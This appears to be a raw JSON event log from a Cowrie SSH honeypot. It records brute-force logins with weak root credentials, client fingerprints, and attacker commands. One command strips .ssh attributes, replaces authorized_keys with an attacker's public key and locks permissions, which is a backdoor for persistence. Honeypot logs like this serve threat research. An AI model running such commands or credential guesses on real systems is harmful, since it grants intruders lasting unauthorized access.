{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:22:05.685656Z","src_ip":"27.112.79.123","session":"3e87d76d1f99"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:22:06.807665Z","src_ip":"27.112.79.123","session":"3e87d76d1f99"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:22:07.083096Z","src_ip":"27.112.79.123","session":"bdcbd34fbf5c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:22:07.083908Z","src_ip":"27.112.79.123","session":"3e87d76d1f99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42652,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb684713d04b","protocol":"ssh","message":"New connection: 212.227.125.160:42652 (1.2.3.4:22) [session: fb684713d04b]","sensor":"my-vps","timestamp":"2025-08-28T11:22:22.891609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:22:22.894016Z","src_ip":"212.227.125.160","session":"fb684713d04b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:22:23.083827Z","src_ip":"212.227.125.160","session":"fb684713d04b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234567","message":"login attempt [admin/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T11:22:23.919243Z","src_ip":"212.227.125.160","session":"fb684713d04b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:22:25.235381Z","src_ip":"212.227.125.160","session":"fb684713d04b"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":26315,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb9d39b52aa0","protocol":"ssh","message":"New connection: 80.94.95.15:26315 (1.2.3.4:22) [session: cb9d39b52aa0]","sensor":"my-vps","timestamp":"2025-08-28T11:22:29.826619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T11:22:29.827623Z","src_ip":"80.94.95.15","session":"cb9d39b52aa0"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T11:22:29.923924Z","src_ip":"80.94.95.15","session":"cb9d39b52aa0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43588,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff9c7bd11eed","protocol":"ssh","message":"New connection: 212.227.235.229:43588 (1.2.3.4:22) [session: ff9c7bd11eed]","sensor":"my-vps","timestamp":"2025-08-28T11:22:30.353708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:22:30.354948Z","src_ip":"212.227.235.229","session":"ff9c7bd11eed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:22:30.598418Z","src_ip":"212.227.235.229","session":"ff9c7bd11eed"}
{"eventid":"cowrie.login.failed","username":"user","password":"amsterdam","message":"login attempt [user/amsterdam] failed","sensor":"my-vps","timestamp":"2025-08-28T11:22:31.269986Z","src_ip":"80.94.95.15","session":"cb9d39b52aa0"}
{"eventid":"cowrie.login.success","username":"root","password":"nomeacuerdo","message":"login attempt [root/nomeacuerdo] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:22:31.568573Z","src_ip":"212.227.235.229","session":"ff9c7bd11eed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:22:32.473953Z","src_ip":"212.227.235.229","session":"ff9c7bd11eed"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:22:32.474650Z","src_ip":"212.227.235.229","session":"ff9c7bd11eed"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:22:32.475543Z","src_ip":"212.227.235.229","session":"ff9c7bd11eed"}
{"eventid":"cowrie.login.failed","username":"user","password":"1959","message":"login attempt [user/1959] failed","sensor":"my-vps","timestamp":"2025-08-28T11:22:32.572045Z","src_ip":"80.94.95.15","session":"cb9d39b52aa0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:22:32.721563Z","src_ip":"212.227.235.229","session":"ff9c7bd11eed"}
{"eventid":"cowrie.login.failed","username":"user","password":"webmaster","message":"login attempt [user/webmaster] failed","sensor":"my-vps","timestamp":"2025-08-28T11:22:33.673688Z","src_ip":"80.94.95.15","session":"cb9d39b52aa0"}
{"eventid":"cowrie.login.failed","username":"user","password":"valley","message":"login attempt [user/valley] failed","sensor":"my-vps","timestamp":"2025-08-28T11:22:34.778062Z","src_ip":"80.94.95.15","session":"cb9d39b52aa0"}
{"eventid":"cowrie.login.failed","username":"user","password":"space","message":"login attempt [user/space] failed","sensor":"my-vps","timestamp":"2025-08-28T11:22:35.878944Z","src_ip":"80.94.95.15","session":"cb9d39b52aa0"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:22:36.981157Z","src_ip":"80.94.95.15","session":"cb9d39b52aa0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53358,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d4b9d3086b0","protocol":"ssh","message":"New connection: 212.227.125.160:53358 (1.2.3.4:22) [session: 3d4b9d3086b0]","sensor":"my-vps","timestamp":"2025-08-28T11:23:05.675018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:23:05.701392Z","src_ip":"212.227.125.160","session":"3d4b9d3086b0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:23:05.837303Z","src_ip":"212.227.125.160","session":"3d4b9d3086b0"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T11:23:06.614311Z","src_ip":"212.227.125.160","session":"3d4b9d3086b0"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:23:07.851192Z","src_ip":"212.227.125.160","session":"3d4b9d3086b0"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":35866,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a4085d9a12c","protocol":"ssh","message":"New connection: 27.112.79.123:35866 (1.2.3.4:22) [session: 6a4085d9a12c]","sensor":"my-vps","timestamp":"2025-08-28T11:23:15.495486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:23:15.496353Z","src_ip":"27.112.79.123","session":"6a4085d9a12c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:23:15.771176Z","src_ip":"27.112.79.123","session":"6a4085d9a12c"}
{"eventid":"cowrie.login.success","username":"root","password":"Google@123","message":"login attempt [root/Google@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:23:16.909548Z","src_ip":"27.112.79.123","session":"6a4085d9a12c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:23:17.487772Z","src_ip":"27.112.79.123","session":"6a4085d9a12c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:23:17.488453Z","src_ip":"27.112.79.123","session":"6a4085d9a12c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:23:17.489521Z","src_ip":"27.112.79.123","session":"6a4085d9a12c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:23:17.764562Z","src_ip":"27.112.79.123","session":"6a4085d9a12c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:23:18.371508Z","src_ip":"27.112.79.123","session":"6a4085d9a12c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:23:18.372240Z","src_ip":"27.112.79.123","session":"6a4085d9a12c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:23:18.648470Z","src_ip":"27.112.79.123","session":"6a4085d9a12c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:23:18.649426Z","src_ip":"27.112.79.123","session":"6a4085d9a12c"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":35876,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b197f761f88","protocol":"ssh","message":"New connection: 27.112.79.123:35876 (1.2.3.4:22) [session: 0b197f761f88]","sensor":"my-vps","timestamp":"2025-08-28T11:23:18.920104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:23:18.921000Z","src_ip":"27.112.79.123","session":"0b197f761f88"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:23:19.189587Z","src_ip":"27.112.79.123","session":"0b197f761f88"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:23:20.306002Z","src_ip":"27.112.79.123","session":"0b197f761f88"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:23:21.579802Z","src_ip":"27.112.79.123","session":"0b197f761f88"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":35888,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a8e870898f5","protocol":"ssh","message":"New connection: 27.112.79.123:35888 (1.2.3.4:22) [session: 8a8e870898f5]","sensor":"my-vps","timestamp":"2025-08-28T11:23:21.844945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:23:21.846961Z","src_ip":"27.112.79.123","session":"8a8e870898f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:23:22.108114Z","src_ip":"27.112.79.123","session":"8a8e870898f5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:23:23.160516Z","src_ip":"27.112.79.123","session":"8a8e870898f5"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:23:23.422215Z","src_ip":"27.112.79.123","session":"6a4085d9a12c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:23:23.423416Z","src_ip":"27.112.79.123","session":"8a8e870898f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3380,"dst_ip":"1.2.3.4","dst_port":22,"session":"f66ab70577f5","protocol":"ssh","message":"New connection: 212.227.235.229:3380 (1.2.3.4:22) [session: f66ab70577f5]","sensor":"my-vps","timestamp":"2025-08-28T11:23:47.265013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T11:23:47.265909Z","src_ip":"212.227.235.229","session":"f66ab70577f5"}
